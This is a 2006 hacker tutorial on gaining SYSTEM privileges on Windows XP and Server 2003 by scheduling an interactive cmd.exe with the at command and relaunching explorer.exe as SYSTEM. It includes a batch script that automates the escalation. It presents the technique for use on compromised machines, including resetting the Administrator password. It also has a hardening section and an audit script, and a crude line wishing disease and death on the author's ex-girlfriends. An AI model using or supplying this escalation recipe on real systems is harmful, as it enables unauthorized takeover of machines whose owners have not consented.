[0.0] Table of Contents
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[1.0] ...................... Abstract
-
[1.1] ..................... Why hackers should care
[2.0] ...................... Introduction to Local System
-
[2.1] ..................... Getting SYSTEM
-
[2.2] ..................... What to do now
-
[2.3] ..................... Abnormalities & experimentation
-
[2.4] ..................... A quick fix
[3.0] ...................... Ending notes
-
[3.1] ..................... Questions/Comments/Contact
-
[3.2] ..................... Shoutz & Flamez
-
[3.3] ..................... Copyright information
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[1.0] Abstract
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Using simple command line tools on a machine running Windows XP we will obtain SYSTEM level privileges and run the entire explorer.exe process (the desktop) as SYSTEM, so that every process started from it inherits SYSTEM privileges. The SYSTEM account sits above Administrator and has full control of the operating system and its kernel. On many machines this can be exploited even with the Guest account. At the time of publishing I have been unable to find any other mention of people running an entire desktop as SYSTEM, although I have seen some articles on the SYSTEM command prompt.
-
[1.1] Why hackers should care
Local privilege escalation is useful on any system a hacker may compromise; the SYSTEM account allows several things that aren't normally possible from the account you broke in with (such as resetting the Administrator password).
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[2.0] Introduction to Local System
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc.); the account shows up as SYSTEM in the Task Manager process list, as seen in the following screenshot:
[screenshot: Task Manager process list with processes owned by SYSTEM]
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most SYSTEM processes are core components the operating system requires, and Task Manager will not end them, even for an Administrator account; attempting to end them results in an error message. The following quote from Wikipedia explains this in an easy-to-understand way:
Quote: |
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT. |
Under normal circumstances a user cannot run code as SYSTEM; only the operating system and its services run under that account. By using the command line, however, we will trick Windows into running our desktop as SYSTEM, along with every application started from within it.
-
[2.1] Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, let's open a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, type at on its own (no arguments) and press [ENTER]. This lists any scheduled at jobs, and whether it runs at all tells you whether you are allowed to use the command.
If it responds with an "access denied" error, then we are out of luck and you'll have to try another method of privilege escalation; if it responds with "There are no entries in the list." (or with several entries already in the list) then we are good. Access to the at command varies: on some installations of Windows even the Guest account can use it, on others it is limited to Administrator accounts. If you can use the at command, enter the following command, then press [ENTER]:
Code: |
at 15:25 /interactive "cmd.exe" |
Let's break down the preceding command. "at" runs the at command, and everything after it is an argument to it. The important thing is to change the time (24-hour format) to one minute after the time currently shown on your computer's clock; for example, if the clock says 4:30 PM, convert that to 24-hour format (16:30) and use 16:31 in the command. If you issue the at command again with no arguments, you should see the job listed, similar to this:
[screenshot: output of at listing the scheduled job]
When the system clock reaches the time you set, a new command prompt will magically appear. The difference is that this one is running with SYSTEM privileges, because it was started by the Task Scheduler service, which runs under the Local System account; the /interactive switch lets the job put its window on the logged-on user's desktop, which works on XP and Server 2003 because the interactive user shares session 0 with services (the session 0 isolation introduced in Vista is what later closed this door). It should look like this:
[screenshot: the new command prompt, with svchost.exe in the title bar]
You'll notice that the title bar reads svchost.exe (Service Host) instead of cmd.exe. Now that we have our SYSTEM command prompt, you may close the old one. Run Task Manager either by pressing CTRL+ALT+DELETE or by typing taskmgr at the command prompt. In Task Manager, go to the Processes tab and end explorer.exe; your desktop and all open folders should disappear, but the SYSTEM command prompt should still be there.
At the SYSTEM command prompt, enter explorer.exe and press [ENTER].
A desktop will come back up, but what is this? It isn't your desktop. Open the Start menu and look at the user name; it should say "SYSTEM". Open Task Manager again and you'll notice that explorer.exe is now running as SYSTEM. The easiest way to get back to your own desktop is to log out and then log back in. The following two screenshots show my results:
[screenshot: SYSTEM user name on the Start menu]
[screenshot: explorer.exe running under SYSTEM]
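The whole of the procedure above, as a batch file you can run from the first (unprivileged) prompt. This is an added example and not part of the original article. It assumes Windows XP or Server 2003, that at.exe is usable by the current user, and that %time% uses the US-style H:MM:SS.hh layout cmd.exe produces on those systems; the "cmd.exe /k set USERNAME" payload is my addition so that the new window prints the account it runs as instead of relying on the title bar.

```batch
@echo off
rem Added example (not from the original article): automate the at.exe trick
rem from section 2.1 on Windows XP / Server 2003. Assumes the US-style %time%
rem layout "H:MM:SS.hh"; other locales may use different separators, in which
rem case adjust the delims in the for loop below.
setlocal EnableDelayedExpansion

rem 1. Can this user talk to the Task Scheduler service at all?
at >nul 2>&1
if errorlevel 1 (
    echo at.exe failed ^(access denied or Schedule service not running^) - try another route
    exit /b 1
)

rem 2. Work out "one minute from now" in 24-hour HH:MM form, the step the
rem    article has you do by hand. Hours may arrive as " 4" or "04", so strip
rem    the space, pad to two digits, and use the 1xx-100 trick so cmd does
rem    not read 08 or 09 as octal.
for /f "tokens=1-2 delims=:." %%a in ("%time%") do (
    set hh=%%a
    set mm=%%b
)
set hh=!hh: =!
if "!hh:~1,1!"=="" set hh=0!hh!
set /a hh=1!hh!-100
set /a mm=1!mm!-100
set /a mm+=1
if !mm! geq 60 (
    set mm=0
    set /a hh+=1
)
rem 23:59 rolls over to 00:00; at treats a time already past as tomorrow.
if !hh! geq 24 set hh=0
if !hh! lss 10 set hh=0!hh!
if !mm! lss 10 set mm=0!mm!

rem 3. Schedule an interactive cmd.exe. "set USERNAME" has no percent signs,
rem    so it is not expanded by this shell; the new window runs it itself and
rem    should print USERNAME=SYSTEM.
at !hh!:!mm! /interactive "cmd.exe /k set USERNAME"

rem 4. Show the queued job, as the article does, so the ID and time are visible.
at
echo Wait for the clock to reach !hh!:!mm!; the window that appears is the SYSTEM prompt.
echo From it run taskmgr, end explorer.exe, then run explorer.exe for a SYSTEM desktop.
endlocal
```

Save it as getsystem.bat and run it from the ordinary prompt; everything after the scheduled window appears (Task Manager, ending explorer.exe, restarting it) is done by hand exactly as described above.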
-
[2.2] What to do now
Now that we have SYSTEM access, everything we run from our explorer process will have it too: browsers, games, etc. You also have the ability to reset the Administrator's password and to kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; you are now God of the Windows machine. I'll leave the rest up to your imagination.
[screenshot: applications running as SYSTEM]
[screenshot: resetting the Administrator's password]
-
[2.3] Abnormalities & experimentation
I've noticed different results depending on the service pack and hotfixes installed; for example, sometimes when I try to open the User Accounts control panel applet I get an error saying the user is not recognized, and the location where the Local System account's profile is stored also varies. I haven't had much time to explore this, so if you find anything else, please use the email address in the contact section of this article and send a note my way.
-
[2.4] A quick fix
One way to prevent this altogether is to make the Task Scheduler service run under an unprivileged account. Open the Services console (Start > Run > services.msc), right-click "Task Scheduler", choose Properties and go to the Log On tab. Change it to "This account", enter the credentials of the account you want it to use (it has to be an existing account), then restart the service. This may break programs that rely on the Task Scheduler for SYSTEM access; you have been warned. Otherwise, simply disable the Task Scheduler service. Whichever you choose, also check who can submit jobs in the first place: by default only members of the local Administrators group can use at, so a Guest or limited user who can is a sign that the machine's permissions have been loosened and deserves a look on its own.
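An audit script for the fix above, added here as an example and not from the original article. It uses only tools shipped with XP and Server 2003 (sc, at, findstr, dir), reports what the scheduler is doing, and leaves the two hardening commands commented out so that running it changes nothing. It assumes an Administrator prompt and the stock locations XP uses for at jobs (%SystemRoot%\Tasks\At1.job, At2.job, ...) and for the scheduler's text log (%SystemRoot%\SchedLgU.txt).

```batch
@echo off
rem Added example (not from the original article): quick audit of the at.exe
rem exposure from section 2.4 on Windows XP / Server 2003. Run from an
rem Administrator prompt. Reports only; uncomment a hardening line to act.

echo === Task Scheduler service: account and startup type
rem A default XP box shows SERVICE_START_NAME : LocalSystem and
rem START_TYPE : 2 AUTO_START, which is exactly what makes the trick work.
sc qc Schedule | findstr /i "START_TYPE SERVICE_START_NAME"
sc query Schedule | findstr /i "STATE"

echo === at jobs currently queued
at

echo === On-disk evidence: legacy at jobs are stored as At1.job, At2.job, ...
echo === in %SystemRoot%\Tasks, and every job start is written to SchedLgU.txt
dir /b "%SystemRoot%\Tasks\At*.job" 2>nul
if exist "%SystemRoot%\SchedLgU.txt" findstr /i /c:".job" "%SystemRoot%\SchedLgU.txt"

echo === Hardening (pick one; either removes the SYSTEM shell):
echo ===   sc config Schedule start= disabled ^&^& sc stop Schedule
echo ===   or re-point the service's Log On account in services.msc to a
echo ===   low-privilege account, as the article suggests (expect breakage).
rem sc config Schedule start= disabled
rem sc stop Schedule
```

The SchedLgU.txt grep is the incident-response angle: an At<n>.job entry that launches cmd.exe from a workstation where nobody schedules jobs is worth a conversation, whether or not the service has since been hardened.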
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[3.0] Ending notes
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thank you for reading my tutorial, this is now my third article, & I'm very happy with how it turned out. I hope I didn't confuse you too much. I also hope you'll be able to use these techniques in your hacking adventures. Please check out my forums; we are looking for people with content for us to publish, & people interested in discussing computers, networking, & information security. We also provide hosting to qualified hacking/programming projects.
-
[3.1] Questions/Comments/Contact
If you have any questions or comments about this tutorial, please feel free to email me at zipk0der@pandora-security.com . You can also reach me by aim, yahoo, or msn; my aim and yahoo screen name is zipk0der, & my msn screen name is the same as my email. I'm always hanging out on my forums, so you can find me there too. You might also find me in #pansec on irc.pandora-security.com
-
[3.2] Shoutz & Flamez
Special thanks to Spawn Point ( http://spawnpoint.us ) for "allowing" me to test this on their machines while mine was down.
Shoutz to stderr, Deanalator, sgtfubar, drraid, ny0nx, epic, varu, Dr Locke Z2A, ch4r, Gnome, & xplicit.
Flamez to my ex-girlfriends (may you all catch AIDS & DIE).
Shout @ me in your articles, send flamez to /dev/null.
-
[3.3] Copyright information
Copyright © 2006 Daniel Hückmann & Pandora Security.
All articles published on Pandora Security may be posted to another site for non-commercial purposes without having to request permission, but please view the full copyright policy @
http://www.pandora-security.com/forum/viewtopic.php?t=2026 beforehand.
No copyright or contact information in this tutorial may be edited or removed.
In summary:
at 15:25 /interactive "cmd.exe" brings up another command window,
and it runs with SYSTEM privileges.
If you run explorer.exe from there, the logged-in user becomes SYSTEM.
At that point you change the Administrator's password.